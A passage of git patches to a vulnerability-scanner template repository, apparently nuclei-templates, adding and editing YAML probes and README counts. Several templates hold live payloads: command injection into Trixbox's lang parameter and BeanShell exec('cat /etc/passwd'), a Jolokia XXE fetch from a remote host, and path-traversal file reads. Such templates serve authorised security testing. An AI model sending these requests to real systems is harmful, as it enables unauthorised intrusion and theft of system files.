/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/json + Content-Length: 86 + Connection: close + + {"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]} + + matchers: + - type: word + words: + - '{"result":{"isDisconnected":' + part: body From 5dd09fe02dd4e277ed77ef21688b73df503965d4 Mon Sep 17 00:00:00 2001 From: fanpan Date: Mon, 31 May 2021 19:28:31 +0530 Subject: [PATCH 061/144] spring 2x path --- .../springboot-actuators-jolokia-xxe-v2.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 vulnerabilities/springboot/springboot-actuators-jolokia-xxe-v2.yaml diff --git a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe-v2.yaml b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe-v2.yaml new file mode 100644 index 0000000000..e9543515ca --- /dev/null +++ b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe-v2.yaml @@ -0,0 +1,31 @@ +id: springboot-actuators-jolokia-xxe-v2 + +info: + name: Spring Boot Actuators (Jolokia) XXE + author: ipanda + severity: high + description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to preform an XML External Entities attack, include content stored on a remote server as if it was its own - this has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. + reference: | + - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators + tags: springboot,jolokia,xxe + +requests: + - method: GET + path: + - "{{BaseURL}}/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "http:\\/\\/random:915\\/logback.xml" + - "reloadByURL" + - "JoranException" + condition: and + part: body + - type: word + words: + - "X-Application-Context" + part: header From 19b73df6be4c5c6bf9f9406f15742870e831990e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 19:44:44 +0530 Subject: [PATCH 062/144] Update CVE-2021-21985.yaml --- cves/2021/CVE-2021-21985.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-21985.yaml b/cves/2021/CVE-2021-21985.yaml index 97118e8ec5..5271910e78 100644 --- a/cves/2021/CVE-2021-21985.yaml +++ b/cves/2021/CVE-2021-21985.yaml @@ -10,7 +10,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-21985 - https://www.vmware.com/security/advisories/VMSA-2021-0010.html - https://github.com/alt3kx/CVE-2021-21985_PoC - tags: cve,cve201,rce,vsphere + tags: cve,cve2021,rce,vsphere requests: - raw: From 0095b6841276a17b58888b3867f1cbdfca5a97f0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 31 May 2021 14:22:37 +0000 Subject: [PATCH 063/144] Auto Update README [Mon May 31 14:22:36 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index d7207c7b14..2b769f3645 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 322 | vulnerabilities | 174 | exposed-panels | 143 | +| cves | 323 | vulnerabilities | 174 | exposed-panels | 143 | | takeovers | 67 | exposures | 106 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**110 directories, 1184 files**. +**110 directories, 1185 files**. From bad1f52fd29218c1423b353a145ba80cb9fffbea Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 20:05:39 +0530 Subject: [PATCH 064/144] Added additional path --- .../springboot-actuators-jolokia-xxe-v2.yaml | 31 ------------------- .../springboot-actuators-jolokia-xxe.yaml | 4 ++- 2 files changed, 3 insertions(+), 32 deletions(-) delete mode 100644 vulnerabilities/springboot/springboot-actuators-jolokia-xxe-v2.yaml diff --git a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe-v2.yaml b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe-v2.yaml deleted file mode 100644 index e9543515ca..0000000000 --- a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe-v2.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: springboot-actuators-jolokia-xxe-v2 - -info: - name: Spring Boot Actuators (Jolokia) XXE - author: ipanda - severity: high - description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to preform an XML External Entities attack, include content stored on a remote server as if it was its own - this has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. - reference: | - - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators - tags: springboot,jolokia,xxe - -requests: - - method: GET - path: - - "{{BaseURL}}/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "http:\\/\\/random:915\\/logback.xml" - - "reloadByURL" - - "JoranException" - condition: and - part: body - - type: word - words: - - "X-Application-Context" - part: header diff --git a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml index d6b61f02fa..c328de1e7d 100644 --- a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml +++ b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml @@ -2,7 +2,7 @@ id: springboot-actuators-jolokia-xxe info: name: Spring Boot Actuators (Jolokia) XXE - author: dwisiswant0 + author: dwisiswant0 & ipanda severity: high description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to preform an XML External Entities attack, include content stored on a remote server as if it was its own - this has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. reference: | @@ -14,6 +14,8 @@ requests: - method: GET path: - "{{BaseURL}}/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml" + - "{{BaseURL}}/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml" + matchers-condition: and matchers: - type: status From fe1ab8385d25a871973e03952afb2f9584970868 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 31 May 2021 11:31:04 -0500 Subject: [PATCH 065/144] Update and rename exposures/logs/circarlife-system-log.yaml to cves/2018/CVE-2018-12634.yaml --- .../2018/CVE-2018-12634.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename exposures/logs/circarlife-system-log.yaml => cves/2018/CVE-2018-12634.yaml (88%) diff --git a/exposures/logs/circarlife-system-log.yaml b/cves/2018/CVE-2018-12634.yaml similarity index 88% rename from exposures/logs/circarlife-system-log.yaml rename to cves/2018/CVE-2018-12634.yaml index 5567438fa5..ac652812c9 100644 --- a/exposures/logs/circarlife-system-log.yaml +++ b/cves/2018/CVE-2018-12634.yaml @@ -1,4 +1,4 @@ -id: circarlife-system-log +id: CVE-2018-12634 info: name: Exposed CirCarLife System Log @@ -6,7 +6,7 @@ info: description: CirCarLife is an internet-connected electric vehicle charging station reference: https://circontrol.com/ severity: medium - tags: scada,circontrol,circarlife,logs + tags: cve,cve2018,scada,circontrol,circarlife,logs requests: - method: GET From 53fc8f8c888b3372561365e8d3a28b27c53329e0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 1 Jun 2021 05:28:14 +0000 Subject: [PATCH 066/144] Auto Update README [Tue Jun 1 05:28:14 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 2b769f3645..bd8c4bbe5b 100644 --- a/README.md +++ b/README.md @@ -38,8 +38,8 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 323 | vulnerabilities | 174 | exposed-panels | 143 | -| takeovers | 67 | exposures | 106 | technologies | 97 | +| cves | 324 | vulnerabilities | 174 | exposed-panels | 143 | +| takeovers | 67 | exposures | 105 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | From b021a0cf49b20fd0f56ec71791809feaf415ef4d Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 1 Jun 2021 11:06:13 +0530 Subject: [PATCH 067/144] Misc changes --- cves/2017/CVE-2017-14535.yaml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/cves/2017/CVE-2017-14535.yaml b/cves/2017/CVE-2017-14535.yaml index 1d890e7405..f72453f16f 100644 --- a/cves/2017/CVE-2017-14535.yaml +++ b/cves/2017/CVE-2017-14535.yaml @@ -1,24 +1,24 @@ id: CVE-2017-14535 info: - name: Trixbox 2.8.0.4 Remote Code Execution + name: Trixbox - 2.8.0.4 OS Command Injection Vulnerability author: pikpikcu severity: high - reference: https://www.exploit-db.com/exploits/49913 - tags: trixbox,rce + reference: | + - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ + - https://www.exploit-db.com/exploits/49913 + tags: cve,cve2017,trixbox,rce requests: - raw: - | - POST /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1 + GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1 Host: {{Hostname}} - User-Agent: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= Connection: close - Upgrade-Insecure-Requests: 1 - Cache-Control: max-age=0 + Cache-Control: max-age=0 matchers-condition: and matchers: From f41ec6bb6890da6828f9d7a52163c549c3c6a9a7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 1 Jun 2021 05:38:14 +0000 Subject: [PATCH 068/144] Auto Update README [Tue Jun 1 05:38:14 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index bd8c4bbe5b..e643970b21 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 324 | vulnerabilities | 174 | exposed-panels | 143 | +| cves | 325 | vulnerabilities | 174 | exposed-panels | 143 | | takeovers | 67 | exposures | 105 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**110 directories, 1185 files**. +**110 directories, 1186 files**. From 21286365c8efab0dc8ff57a675cf18341611e2a0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 1 Jun 2021 06:07:00 +0000 Subject: [PATCH 069/144] Auto Update README [Tue Jun 1 06:07:00 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index e643970b21..3462c2d10f 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 325 | vulnerabilities | 174 | exposed-panels | 143 | +| cves | 325 | vulnerabilities | 175 | exposed-panels | 143 | | takeovers | 67 | exposures | 105 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**110 directories, 1186 files**. +**110 directories, 1187 files**. From 0b85f59a6289032f82d322f546b78b06746d994d Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 1 Jun 2021 13:05:11 +0530 Subject: [PATCH 070/144] Adding max-size limit to avoid timeout --- exposures/backups/zip-backup-files.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/exposures/backups/zip-backup-files.yaml b/exposures/backups/zip-backup-files.yaml index 3a768423d0..6feee72a8e 100644 --- a/exposures/backups/zip-backup-files.yaml +++ b/exposures/backups/zip-backup-files.yaml @@ -32,6 +32,8 @@ requests: - "{{BaseURL}}/{{Hostname}}.sql.zip" - "{{BaseURL}}/{{Hostname}}.sql.z" - "{{BaseURL}}/{{Hostname}}.sql.tar.z" + + max-size: 500 # Size in bytes - Max Size to read from server response matchers-condition: and matchers: - type: binary @@ -49,10 +51,12 @@ requests: - "504B0304" # zip condition: or part: body + - type: regex regex: - "application/[-\\w.]+" part: header + - type: status status: - 200 From 91941dc8edafe16ead11507324d3d47ab35f1456 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 1 Jun 2021 13:21:24 +0530 Subject: [PATCH 071/144] Adding max-size to avoid timeout --- exposures/backups/sql-dump.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/exposures/backups/sql-dump.yaml b/exposures/backups/sql-dump.yaml index d6a967bb24..ed7bb21c67 100644 --- a/exposures/backups/sql-dump.yaml +++ b/exposures/backups/sql-dump.yaml @@ -30,12 +30,15 @@ requests: - "{{BaseURL}}/wp-content/uploads/dump.sql" headers: Range: "bytes=0-3000" + + max-size: 2000 # Size in bytes - Max Size to read from server response matchers-condition: and matchers: - type: regex regex: - "(?m)(?:DROP|CREATE|(?:UN)?LOCK) TABLE|INSERT INTO" part: body + - type: status status: - 200 From 39003369f2faba7a542a133b41e3720dbdee0163 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 1 Jun 2021 08:28:04 +0000 Subject: [PATCH 072/144] Create nc-bsh-servlet-rce.yaml --- vulnerabilities/other/nc-bsh-servlet-rce.yaml | 40 +++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 vulnerabilities/other/nc-bsh-servlet-rce.yaml diff --git a/vulnerabilities/other/nc-bsh-servlet-rce.yaml b/vulnerabilities/other/nc-bsh-servlet-rce.yaml new file mode 100644 index 0000000000..0aa2f0ee04 --- /dev/null +++ b/vulnerabilities/other/nc-bsh-servlet-rce.yaml @@ -0,0 +1,40 @@ +id: nc-bsh-servlet-rce + +info: + name: NC bsh.servlet.BshServlet RCE + author: pikpikcu + severity: high + reference: https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A + tags: beanshell,rce + +requests: + - raw: + - | #linux + POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 + Content-Type: application/x-www-form-urlencoded + + bsh.script=exec("cat /etc/passwd"); + + - | #windows + POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 + Content-Type: application/x-www-form-urlencoded + + bsh.script=exec("ipconfig"); + + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + - "Windows IP" + + - type: status + status: + - 200 + From d5b9e4c7b6262e634b5d338eda9dc395abc77d27 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 1 Jun 2021 14:09:01 +0530 Subject: [PATCH 073/144] Update ns-asg-file-read.yaml --- vulnerabilities/other/ns-asg-file-read.yaml | 9 +++------ 1 file changed, 3 insertions(+), 6 deletions(-) diff --git a/vulnerabilities/other/ns-asg-file-read.yaml b/vulnerabilities/other/ns-asg-file-read.yaml index 8fb79f6637..66e112d2de 100644 --- a/vulnerabilities/other/ns-asg-file-read.yaml +++ b/vulnerabilities/other/ns-asg-file-read.yaml @@ -1,16 +1,14 @@ -id: ns-asg-file-read +id: nsasg-arbitrary-file-read info: - name: NS ASG File Read + name: NS ASG Arbitrary File Read author: pikpikcu severity: high - reference: http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E7%BD%91%E5%BA%B7%20NS-ASG%E5%AE%89%E5%85%A8%E7%BD%91%E5%85%B3/%E7%BD%91%E5%BA%B7%20NS-ASG%E5%AE%89%E5%85%A8%E7%BD%91%E5%85%B3%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md - tags: ns-asg,lfi + tags: nsasg,lfi requests: - method: GET path: - - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php" - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd" matchers-condition: and @@ -19,7 +17,6 @@ requests: - type: regex regex: - "root:[x*]:0:0" - - "$certfile" - type: status status: From 02a337278adea19af8baf4679abd00ea0bee29d0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 1 Jun 2021 08:40:28 +0000 Subject: [PATCH 074/144] Auto Update README [Tue Jun 1 08:40:28 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 3462c2d10f..b986e760fe 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 325 | vulnerabilities | 175 | exposed-panels | 143 | +| cves | 325 | vulnerabilities | 176 | exposed-panels | 143 | | takeovers | 67 | exposures | 105 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**110 directories, 1187 files**. +**110 directories, 1188 files**. From 3375e16caaa88a359434bc7a96744e8fe51ac546 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 1 Jun 2021 14:39:59 +0530 Subject: [PATCH 075/144] Added zenario-login-panel --- exposed-panels/zenario-login-panel.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/zenario-login-panel.yaml diff --git a/exposed-panels/zenario-login-panel.yaml b/exposed-panels/zenario-login-panel.yaml new file mode 100644 index 0000000000..817bcf573f --- /dev/null +++ b/exposed-panels/zenario-login-panel.yaml @@ -0,0 +1,22 @@ +id: zenario-login-panel + +info: + name: Zenario Admin login + author: __Fazal + severity: info + tags: panel,zenario + +requests: + - method: GET + path: + - '{{BaseURL}}/zenario/admin/welcome.php' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Welcome to Zenario" From 5f834ffdf9ff4c592e2aeb8a1c444b4c8a01f9f0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 1 Jun 2021 09:11:41 +0000 Subject: [PATCH 076/144] Auto Update README [Tue Jun 1 09:11:41 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b986e760fe..1c0cd31d73 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 325 | vulnerabilities | 176 | exposed-panels | 143 | +| cves | 325 | vulnerabilities | 176 | exposed-panels | 144 | | takeovers | 67 | exposures | 105 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**110 directories, 1188 files**. +**110 directories, 1189 files**. From a5ccb5f893c0ead456b4e2f70c3bede1d8d002d9 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 1 Jun 2021 16:08:41 +0530 Subject: [PATCH 077/144] strict matcher --- .../other/hjtcloud-rest-arbitrary-file-read.yaml | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml b/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml index a19bed8900..6641fa4b62 100644 --- a/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml +++ b/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml @@ -17,10 +17,17 @@ requests: - type: word words: - - "name" - - "length" - - "filePath" + - '"name":' + - '"length":' + - '"filePath":' + - '"list":' condition: and + part: body + + - type: word + words: + - "application/json" + part: header - type: status status: From 9f8852572e3c7589ac7af5eaddf0236332854e43 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 1 Jun 2021 10:53:26 +0000 Subject: [PATCH 078/144] Create alibaba-mongoshake-unauth.yaml --- .../alibaba-mongoshake-unauth.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 misconfiguration/alibaba-mongoshake-unauth.yaml diff --git a/misconfiguration/alibaba-mongoshake-unauth.yaml b/misconfiguration/alibaba-mongoshake-unauth.yaml new file mode 100644 index 0000000000..83af0df25a --- /dev/null +++ b/misconfiguration/alibaba-mongoshake-unauth.yaml @@ -0,0 +1,29 @@ +id: alibaba-mongoshake-unauth + +info: + name: Alibaba Mongoshake Unauth + author: pikpikcu + severity: info + tags: mongoshake,unauth + +requests: + - method: GET + path: + - '{{BaseURL}}/conf' + - '{{BaseURL}}/worker' + - '{{BaseURL}}/repl' + + matchers-condition: and + matchers: + + - type: word + words: + - 'MongoUrls' + - 'worker_id' + - 'jobs_in_queue' + - 'logs_repl' + - 'who' + + - type: status + status: + - 200 From 5d083f1124e8798ab602dd6cc5146b7b5b84287a Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 1 Jun 2021 09:07:39 -0500 Subject: [PATCH 079/144] Create detect-drone-config.yaml --- exposures/configs/detect-drone-config.yaml | 25 ++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposures/configs/detect-drone-config.yaml diff --git a/exposures/configs/detect-drone-config.yaml b/exposures/configs/detect-drone-config.yaml new file mode 100644 index 0000000000..68cc1afdd1 --- /dev/null +++ b/exposures/configs/detect-drone-config.yaml @@ -0,0 +1,25 @@ +id: detect-drone-config + +info: + name: Detect Drone Configuration + author: geeknik + description: Drone is a Container-Native, Continuous Delivery Platform -- https://github.com/drone/drone + severity: high + tags: config,exposure,auth + +requests: + - method: GET + path: + - "{{BaseURL}}/.drone.yml" + + matchers-condition: and + matchers: + - type: word + words: + - "services:" + - "environment:" + - "commands:" + condition: and + - type: status + status: + - 200 From d949ad7520981f54f5864894f78cd24c573628b8 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 1 Jun 2021 18:22:05 +0000 Subject: [PATCH 080/144] Update general-tokens.yaml fix another false positive --- exposures/tokens/generic/general-tokens.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposures/tokens/generic/general-tokens.yaml b/exposures/tokens/generic/general-tokens.yaml index 157c304f03..d2fc17a7a6 100644 --- a/exposures/tokens/generic/general-tokens.yaml +++ b/exposures/tokens/generic/general-tokens.yaml @@ -26,6 +26,8 @@ requests: part: body regex: - (K|k)ey(up|down|press) + - (K|k)eyboard(N|n)avigation + condition: or negative: true extractors: From 259eb048ccc74ec5c9de41203b2000d28f29e41e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 2 Jun 2021 00:33:22 +0530 Subject: [PATCH 081/144] Update detect-drone-config.yaml --- exposures/configs/detect-drone-config.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exposures/configs/detect-drone-config.yaml b/exposures/configs/detect-drone-config.yaml index 68cc1afdd1..ee206c7f59 100644 --- a/exposures/configs/detect-drone-config.yaml +++ b/exposures/configs/detect-drone-config.yaml @@ -16,9 +16,9 @@ requests: matchers: - type: word words: - - "services:" - - "environment:" - - "commands:" + - "kind:" + - "name:" + - "steps:" condition: and - type: status status: From cdf6cdf6386d5d46436d44547e5b50ebf7513fd8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 2 Jun 2021 00:38:33 +0530 Subject: [PATCH 082/144] Update detect-drone-config.yaml --- exposures/configs/detect-drone-config.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/configs/detect-drone-config.yaml b/exposures/configs/detect-drone-config.yaml index ee206c7f59..01384c4d0a 100644 --- a/exposures/configs/detect-drone-config.yaml +++ b/exposures/configs/detect-drone-config.yaml @@ -5,7 +5,7 @@ info: author: geeknik description: Drone is a Container-Native, Continuous Delivery Platform -- https://github.com/drone/drone severity: high - tags: config,exposure,auth + tags: config,exposure,drone requests: - method: GET From 780634da513ff1b373897f8e33bdc634c6350c99 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 1 Jun 2021 19:30:18 +0000 Subject: [PATCH 083/144] Auto Update README [Tue Jun 1 19:30:18 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 1c0cd31d73..5616d1ec3b 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 325 | vulnerabilities | 176 | exposed-panels | 144 | -| takeovers | 67 | exposures | 105 | technologies | 97 | +| takeovers | 67 | exposures | 106 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**110 directories, 1189 files**. +**110 directories, 1190 files**. From f63cd48c790a837dc5c0aa83b9602fa4aeec5f0c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 2 Jun 2021 01:16:41 +0530 Subject: [PATCH 084/144] Update alibaba-mongoshake-unauth.yaml --- misconfiguration/alibaba-mongoshake-unauth.yaml | 14 ++++++-------- 1 file changed, 6 insertions(+), 8 deletions(-) diff --git a/misconfiguration/alibaba-mongoshake-unauth.yaml b/misconfiguration/alibaba-mongoshake-unauth.yaml index 83af0df25a..6de46b6ec7 100644 --- a/misconfiguration/alibaba-mongoshake-unauth.yaml +++ b/misconfiguration/alibaba-mongoshake-unauth.yaml @@ -9,20 +9,18 @@ info: requests: - method: GET path: - - '{{BaseURL}}/conf' - - '{{BaseURL}}/worker' - - '{{BaseURL}}/repl' + - '{{BaseURL}}/' matchers-condition: and matchers: - type: word words: - - 'MongoUrls' - - 'worker_id' - - 'jobs_in_queue' - - 'logs_repl' - - 'who' + - '{"Uri":"/worker","Method":"GET"}' + - type: word + words: + - 'text/plain' + part: header - type: status status: From f05668635effb2de35f49dfab7fd1022d8d7800b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 1 Jun 2021 19:49:34 +0000 Subject: [PATCH 085/144] Auto Update README [Tue Jun 1 19:49:34 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 5616d1ec3b..492cfc0947 100644 --- a/README.md +++ b/README.md @@ -40,11 +40,11 @@ An overview of the nuclei template directory including number of templates assoc | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 325 | vulnerabilities | 176 | exposed-panels | 144 | | takeovers | 67 | exposures | 106 | technologies | 97 | -| misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | +| misconfiguration | 67 | workflows | 31 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**110 directories, 1190 files**. +**110 directories, 1191 files**. From 26787211746f5ebf00ce4471cb9940311c664bc4 Mon Sep 17 00:00:00 2001 From: root Date: Wed, 2 Jun 2021 00:06:20 +0100 Subject: [PATCH 086/144] Added new path for CVE-2021-22122.yaml --- cves/2021/CVE-2021-22122.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-22122.yaml b/cves/2021/CVE-2021-22122.yaml index 60c70d0949..b7023eb868 100644 --- a/cves/2021/CVE-2021-22122.yaml +++ b/cves/2021/CVE-2021-22122.yaml @@ -23,6 +23,7 @@ requests: - method: GET path: - 